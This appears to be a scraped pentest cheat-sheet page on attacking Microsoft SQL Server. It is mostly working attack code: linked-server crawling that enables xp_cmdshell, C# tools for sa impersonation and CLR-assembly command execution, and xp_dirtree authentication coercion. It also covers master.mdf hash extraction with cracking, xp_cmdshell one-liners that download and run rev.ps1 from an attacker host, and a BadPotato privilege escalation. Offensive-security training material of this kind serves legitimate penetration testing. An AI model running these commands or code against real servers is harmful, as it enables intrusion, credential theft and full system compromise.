[https://docs.microsoft.com/en-us/sql/machine-learning/tutorials/quickstart-python-create-script?view=sql-server-ver15](https://docs.microsoft.com/en-us/sql/machine-learning/tutorials/quickstart-python-create-script?view=sql-server-ver15) * [https://www.sqlshack.com/how-to-use-python-in-sql-server-2017-to-obtain-advanced-data-analytics/](https://www.sqlshack.com/how-to-use-python-in-sql-server-2017-to-obtain-advanced-data-analytics/) Enable external scripts: Run Python code: [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#master.mdf) master.mdf ---------------------------------------------------------------------------------------- * [https://xpnsec.tumblr.com/post/145350063196/reading-mdf-hashes-with-powershell](https://xpnsec.tumblr.com/post/145350063196/reading-mdf-hashes-with-powershell) * [https://github.com/xpn/Powershell-PostExploitation/tree/master/Invoke-MDFHashes](https://github.com/xpn/Powershell-PostExploitation/tree/master/Invoke-MDFHashes) * [https://www.nucleustechnologies.com/blog/mdf-file-location-in-sql-server-2014-2016-2017/](https://www.nucleustechnologies.com/blog/mdf-file-location-in-sql-server-2014-2016-2017/) * [https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module\_source/collection/Invoke-NinjaCopy.ps1](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/collection/Invoke-NinjaCopy.ps1) * [https://github.com/jschicht/RawCopy](https://github.com/jschicht/RawCopy) * [https://specterops.io/blog/2025/04/08/the-sql-server-crypto-detour/](https://specterops.io/blog/2025/04/08/the-sql-server-crypto-detour/) [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#c-examples) C# Examples ----------------------------------------------------------------------------------------- * [https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/MSSQL/Program.cs](https://github.com/chvancooten/OSEP-Code-Snippets/blob/main/MSSQL/Program.cs) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#custom-assemblies) Custom Assemblies Load and trigger custom assembly: Custom assembly code example (must be compiled to `SqlCmdExec.dll`): Convert custom assembly DLL to a hex string: [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#tools) Tools ------------------------------------------------------------------------------ * [https://www.heidisql.com/download.php](https://www.heidisql.com/download.php) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#sqsh) sqsh ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#mssqlclient.py) mssqlclient.py ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#mssql_shell.py) mssql\_shell.py * [https://github.com/Alamot/code-snippets/blob/master/mssql/mssql\_shell.py](https://github.com/Alamot/code-snippets/blob/master/mssql/mssql_shell.py) Change `MSSQL_SERVER`, `MSSQL_USERNAME` and `MSSQL_PASSWORD` before running. A scenario when [abusing SeImpersonatePrivilege with PrintSpoofer](https://ppn.snovvcra.sh/pentest/infrastructure/ad/privileges-abuse#printspoofer) (BadPotato): ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#mssql-cli) mssql-cli * [https://github.com/dbcli/mssql-cli](https://github.com/dbcli/mssql-cli) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#powerupsql) PowerUpSQL * [https://github.com/NetSPI/PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#daft) DAFT * [https://github.com/NetSPI/DAFT](https://github.com/NetSPI/DAFT) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#esc) ESC * [https://github.com/NetSPI/ESC](https://github.com/NetSPI/ESC) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#sqlrecon) SQLRecon * [https://github.com/skahwah/SQLRecon](https://github.com/skahwah/SQLRecon) * [https://github.com/Tw1sm/PySQLRecon](https://github.com/Tw1sm/PySQLRecon) ### [](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#mssql-spider) mssql-spider * [https://github.com/dadevel/mssql-spider](https://github.com/dadevel/mssql-spider) Last updated 1 year ago * [Enumeration](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#enumeration) * [UNC Path Injection](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#unc-path-injection) * [Crawl Links](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#crawl-links) * [LDAP Enumeration via OpenQuery](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#ldap-enumeration-via-openquery) * [External Scripts](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#external-scripts) * [master.mdf](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#master.mdf) * [C# Examples](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#c-examples) * [Custom Assemblies](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#custom-assemblies) * [Tools](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#tools) * [sqsh](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#sqsh) * [mssqlclient.py](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#mssqlclient.py) * [mssql\_shell.py](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#mssql_shell.py) * [mssql-cli](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#mssql-cli) * [PowerUpSQL](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#powerupsql) * [DAFT](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#daft) * [ESC](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#esc) * [SQLRecon](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#sqlrecon) * [mssql-spider](https://ppn.snovvcra.sh/pentest/infrastructure/dbms/mssql#mssql-spider) Copy SELECT SYSTEM_USER; Copy SELECT USER; Copy SELECT IS_SRVROLEMEMBER('public'); SELECT IS_SRVROLEMEMBER('sysadmin'); Copy SELECT name FROM master..sysdatabases; Copy EXEC sp_linkedservers; Copy SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'; Copy SQL > EXEC master..xp_dirtree '\\10.10.13.37\share\test.txt'; PowerUpSQL > Get-SQLQuery -Instance "SQLSRV01.megacorp.local,1433" -Query "EXEC master..xp_dirtree '\\10.10.13.37\share\test.txt'" Copy EXEC sp_serveroption 'SQLSRV01','rpc','true'; EXEC sp_serveroption 'SQLSRV01','rpc out','true'; EXEC ('select SYSTEM_USER;') AT [SQLSRV01]; EXEC ('EXEC (''select SYSTEM_USER;'') AT [SQLSRV02];') AT [SQLSRV01]; EXEC ('EXEC sp_configure ''show advanced options'',1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'',1; RECONFIGURE;') AT [SQLSRV01]; EXEC ('EXEC (''EXEC sp_configure ''''show advanced options'''',1; RECONFIGURE; EXEC sp_configure ''''xp_cmdshell'''',1; RECONFIGURE;'') AT [SQLSRV02];') AT [SQLSRV01]; EXEC ('EXEC xp_cmdshell ''cmd /c ping -n 2 10.10.13.37'';') AT [SQLSRV01]; EXEC ('EXEC (''EXEC xp_cmdshell ''''cmd /c ping -n 2 10.10.13.37'''';'') AT [SQLSRV02];') AT [SQLSRV01]; SqlCrawlLinks.cs Copy using System; using System.Data.SqlClient; namespace SqlCrawlLinks { class Program { static string sqlQuery(string query, SqlConnection con) { SqlCommand command = new SqlCommand(query, con); SqlDataReader reader = command.ExecuteReader(); string result = ""; try { while (reader.Read()) { result += $"{reader[0]}\n"; } result = result.Remove(result.Length - 1); } catch { } reader.Close(); return result; } static void Main(string[] args) { // Authenticate string sqlServer = "SQLSRV01.corp1.com"; string database = "master"; string conString = $"Server = {sqlServer}; Database = {database}; Integrated Security = True;"; SqlConnection con = new SqlConnection(conString); try { con.Open(); Console.WriteLine("[+] Auth success!"); } catch { Console.WriteLine("[-] Auth failed"); Environment.Exit(0); } // List linked servers string result = sqlQuery("EXEC sp_linkedservers;", con); Console.WriteLine($"[*] Linked SQL servers:\n{result}"); // Enumerate current login on the linked server result = sqlQuery("select login from openquery(\"SQLSRV02\", 'select SYSTEM_USER as login');", con); Console.WriteLine($"[*] Executing as the login {result} at SQLSRV02"); // Enable xp_cmdshell on the linked server sqlQuery("EXEC ('EXEC sp_configure ''show advanced options'',1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'',1; RECONFIGURE;') AT [SQLSRV02];", con); // RCE via EXEC at on the linked server result = sqlQuery("EXEC ('EXEC xp_cmdshell ''whoami'';') AT [SQLSRV02];", con); Console.WriteLine($"[*] xp_cmdshell at SQLSRV02 via EXEC AT: {result}"); // RCE via OPENQUERY on the linked server sqlQuery("select 1 from openquery(\"SQLSRV02\", 'select 1; EXEC sp_configure ''show advanced options'',1; reconfigure; EXEC sp_configure ''xp_cmdshell'',1; reconfigure;');", con) sqlQuery("select 1 from openquery(\"SQLSRV02\", 'select 1; EXEC xp_cmdshell ''cmd /c ping -n 2 10.10.13.37'';');", con); // Double-hop RCE on the target server (SQLSRV01) from the linked server (SQLSRV02) sqlQuery("EXEC ('EXEC (''EXEC sp_configure ''''show advanced options'''',1; RECONFIGURE; EXEC sp_configure ''''xp_cmdshell'''',1; RECONFIGURE;'') AT [SQLSRV01];') AT [SQLSRV02];", con); sqlQuery("EXEC ('EXEC (''EXEC xp_cmdshell ''''cmd /c ping -n 2 10.10.13.37'''';'') AT [SQLSRV01];') AT [SQLSRV02];", con); con.Close(); } } } Copy msf > use exploit/windows/mssql/mssql_linkcrawler msf exploit(windows/mssql/mssql_linkcrawler) > set RHOSTS 192.168.1.11 msf exploit(windows/mssql/mssql_linkcrawler) > set USERNAME sa msf exploit(windows/mssql/mssql_linkcrawler) > set PASSWORD Passw0rd! msf exploit(windows/mssql/mssql_linkcrawler) > set DEPLOY true msf exploit(windows/mssql/mssql_linkcrawler) > set VERBOSE true msf exploit(windows/mssql/mssql_linkcrawler) > run Copy PS > Get-SQLInstanceDomain | Get-SQLConnectionTest PS > Get-SQLServerInfo -Instance "sqlsrv01.megacorp.local,1433" PS > Get-SQLQuery -Instance "sqlsrv01.megacorp.local,1433" -Query "select * from openquery(""sqlsrv02.megacorp.local"", 'select * from information_schema.tables')" PS > Get-SQLServerLinkCrawl -Instance "sqlsrv01.megacorp.local,1433" PS > Get-SQLServerLinkCrawl -Instance "sqlsrv01.megacorp.local,1433" -Query "SELECT * FROM master..syslogins" | ft PS > Get-SQLServerLinkCrawl -Instance "sqlsrv01.megacorp.local\SQLEXPRESS" -Username sa -Password "Passw0rd!" -Query "SELECT name FROM master..sysdatabases" Copy EXEC sp_configure 'external scripts enabled,1'; Copy EXEC sp_execute_external_script @language=N'Python', @script=N' with open(''c:\\inetpub\\wwwroot\\web.config'', ''r'') as f: print(f.read()) ' Copy PS > Invoke-NinjaCopy -Path "C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\DATA\master.mdf" -LocalDestination "C:\Windows\Temp\master.mdf" PS > [Reflection.Assembly]::LoadFile("$pwd\OrcaMDF.RawCore.dll") PS > [Reflection.Assembly]::LoadFile("$pwd\OrcaMDF.Framework.dll") PS > . .\Get-MDFHashes.ps1 PS > Get-MDFHashes -mdf "C:\Windows\Temp\master.mdf" $ hashcat -m 132 -O -a 0 -w 3 --session=mssql -o mssql.out mssql.in seclists/Passwords/darkc0de.txt -r rules/d3ad0ne.rule MSSQL.cs Copy using System; using System.Data.SqlClient; namespace MSSQL { class Program { static string sqlQuery(string query, SqlConnection con) { SqlCommand command = new SqlCommand(query, con); SqlDataReader reader = command.ExecuteReader(); string result = ""; try { while (reader.Read()) { result += $"{reader[0]}\n"; } result = result.Remove(result.Length - 1); } catch { } reader.Close(); return result; } static void Main(string[] args) { // Authenticate string sqlServer = "SQLSRV01.megacorp.local"; string database = "master"; string conString = $"Server = {sqlServer}; Database = {database}; Integrated Security = True;"; SqlConnection con = new SqlConnection(conString); try { con.Open(); Console.WriteLine("[+] Auth success!"); } catch { Console.WriteLine("[-] Auth failed"); Environment.Exit(0); } // Enumerate login name (SQL Server login or Domain/Windows username) string result = sqlQuery("SELECT SYSTEM_USER;", con); Console.WriteLine($"[*] Logged in as: {result}"); // Enumerate database username result = sqlQuery("SELECT USER;", con); Console.WriteLine($"[*] Mapped to the user: {result}"); // Check if we have public role assigned result = sqlQuery("SELECT IS_SRVROLEMEMBER('public');", con); Int32 val = Int32.Parse(result.ToString()); if (val == 1) { Console.WriteLine("[*] User is a member of public role"); } else { Console.WriteLine("[*] User is NOT a member of public role"); } // Invoke xp_dirtree to coerce authentication on attacker's machine string lhost = args[0]; sqlQuery($@"EXEC master..xp_dirtree '\\{lhost}\test';", con); Console.WriteLine($"[*] Invoked xp_dirtree against {lhost}"); // Enumerate logins that we can impersonate result = sqlQuery("SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE';", con); Console.WriteLine($"[*] Logins that can be impersonated:\n{result}"); // Impersonate sa user result = sqlQuery("EXECUTE AS LOGIN = 'sa'; SELECT SYSTEM_USER;", con); Console.WriteLine($"[*] Executing in context of impersonated user: {result}"); // Impersonate dbo database user result = sqlQuery("use msdb; EXECUTE AS USER = 'dbo'; SELECT USER;", con); Console.WriteLine($"[*] Executing in context of impersonated login: {result}"); // Execute OS commands via xp_cmdshell sqlQuery("EXECUTE AS LOGIN = 'sa';", con); sqlQuery("EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;", con); Console.WriteLine("[+] Enabled xp_cmdshell"); result = sqlQuery("EXEC xp_cmdshell whoami", con); Console.WriteLine($"[*] xp_cmdshell: {result}"); // Execute OS commands via Ole Automation Procedures sqlQuery("EXECUTE AS LOGIN = 'sa';", con); sqlQuery("EXEC sp_configure 'Ole Automation Procedures',1; RECONFIGURE; ", con); sqlQuery(@"DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, 'cmd /c echo Test > C:\Windows\Tasks\out.txt';", con); con.Close(); } } } SqlCustomAssembly.cs Copy using System; using System.Data.SqlClient; namespace SqlProcedure { class Program { static string sqlQuery(string query, SqlConnection con) { SqlCommand command = new SqlCommand(query, con); SqlDataReader reader = command.ExecuteReader(); string result = ""; try { while (reader.Read()) { result += $"{reader[0]}\n"; } result = result.Remove(result.Length - 1); } catch { } reader.Close(); return result; } static void Main(string[] args) { // Authenticate string sqlServer = "SQLSRV01.megacorp.local"; string database = "master"; string conString = $"Server = {sqlServer}; Database = {database}; Integrated Security = True;"; SqlConnection con = new SqlConnection(conString); try { con.Open(); Console.WriteLine("[+] Auth success!"); } catch { Console.WriteLine("[-] Auth failed"); Environment.Exit(0); } // Impersonate sa user sqlQuery("EXECUTE AS LOGIN = 'sa';", con); // Drop existing procedure and assembly sqlQuery(@"use msdb; DROP PROCEDURE IF EXISTS SqlCmdExec;", con); sqlQuery(@"use msdb; DROP ASSEMBLY IF EXISTS myAssembly1;", con); // Enable CLR integration sqlQuery("use msdb; EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'clr enabled',1; RECONFIGURE; EXEC sp_configure 'clr strict security',0; RECONFIGURE;", con); Console.WriteLine("[+] Enabled CLR integration"); // Create new assembly sqlQuery(@"CREATE ASSEMBLY myAssembly1 FROM 'C:\Windows\Tasks\SqlCmdExec.dll' WITH PERMISSION_SET = UNSAFE;", con); //sqlQuery(@"CREATE ASSEMBLY my_assembly FROM 0x31337... WITH PERMISSION_SET = UNSAFE;", con); Console.WriteLine("[+] Created new assembly"); // Create new procedure sqlQuery(@"CREATE PROCEDURE [dbo].[SqlCmdExec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [myAssembly1].[StoredProcedures].[SqlCmdExec];", con); Console.WriteLine("[+] Created new procedure"); // Trigger custom class for RCE string result = sqlQuery("EXEC SqlCmdExec 'whoami';", con); Console.WriteLine($"[*] SqlCmdExec: {result}"); con.Close(); } } } SqlCmdExec.cs Copy using Microsoft.SqlServer.Server; using System.Data.SqlTypes; using System.Diagnostics; public class StoredProcedures { [Microsoft.SqlServer.Server.SqlProcedure] public static void cmdExec(SqlString execCommand) { Process proc = new Process(); proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; proc.StartInfo.Arguments = string.Format($@" /c {execCommand}"); proc.StartInfo.UseShellExecute = false; proc.StartInfo.RedirectStandardOutput = true; proc.Start(); SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", System.Data.SqlDbType.NVarChar, 4000)); SqlContext.Pipe.SendResultsStart(record); record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); SqlContext.Pipe.SendResultsRow(record); SqlContext.Pipe.SendResultsEnd(); proc.WaitForExit(); proc.Close(); } } Convert-AssemblyToHex.ps1 Copy $assemblyFile = "SqlCmdExec.dll" $stringBuilder = New-Object -Type System.Text.StringBuilder $fileStream = [IO.File]::OpenRead($assemblyFile) while (($byte = $fileStream.ReadByte()) -gt -1) { $stringBuilder.Append($byte.ToString("X2")) | Out-Null } $stringBuilder.ToString() -join "" | Out-File SqlCmdExec.txt Copy $ sqsh -S 127.0.0.1 -U 'MEGACORP\snovvcrash' -P 'Passw0rd!' 1> xp_cmdshell "powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/rev.ps1')" 2> GO Copy $ mssqlclient.py MEGACORP/snovvcrash:'Passw0rd!'@127.0.0.1 [-windows-auth] SQL> xp_cmdshell "powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString(\"http://10.10.13.37/rev.ps1\")" Copy $ python3 mssql_shell.py CMD MSSQL$SQLEXPRESS@SQL01 C:\Windows\system32> UPLOAD pwn.exe \Windows\System32\spool\drivers\color\pwn.exe CMD MSSQL$SQLEXPRESS@SQL01 C:\Windows\system32> UPLOAD Invoke-BadPotato.ps1 \Windows\System32\spool\drivers\color\potato.ps1 // . .\Invoke-BadPotato.ps1; Invoke-BadPotato -C "C:\Windows\System32\spool\drivers\color\pwn.exe" CMD MSSQL$SQLEXPRESS@SQL01 C:\Windows\system32> powershell -enc LgAgAC4AXABJAG4AdgBvAGsAZQAtAEIAYQBkAFAAbwB0AGEAdABvAC4AcABzADEAOwAgAEkAbgB2AG8AawBlAC0AQgBhAGQAUABvAHQAYQB0AG8AIAAtAEMAIAAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABTAHkAcwB0AGUAbQAzADIAXABzAHAAbwBvAGwAXABkAHIAaQB2AGUAcgBzAFwAYwBvAGwAbwByAFwAcAB3AG4ALgBlAHgAZQAiAAoA Copy $ python -m pip install mssql-cli $ mssql-cli -S 127.0.0.1 -U 'MEGACORP\snovvcrash' -P 'Passw0rd!' Copy PS > Get-SQLInstanceDomain PS > Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo PS > Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLColumnSampleDataThreaded -Keywords "project" -SampleSize 5 | select instance, database, column, sample | ft -autosize PS > Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded -Threads 10 -Username sa -Password 'Passw0rd!' -Verbose PS > Get-SQLQuery -Instance "SQLSRV01.megacorp.local,1433" -Query "select @@servername" PS > Invoke-SQLOSCmd -Username sa -Password 'Passw0rd!' -Instance sqlsrv01.megacorp.local -Command "whoami" -RawResults PS > Invoke-SQLAudit -Instance WEB01 -Username sa -Password 'Passw0rd!' -Verbose ---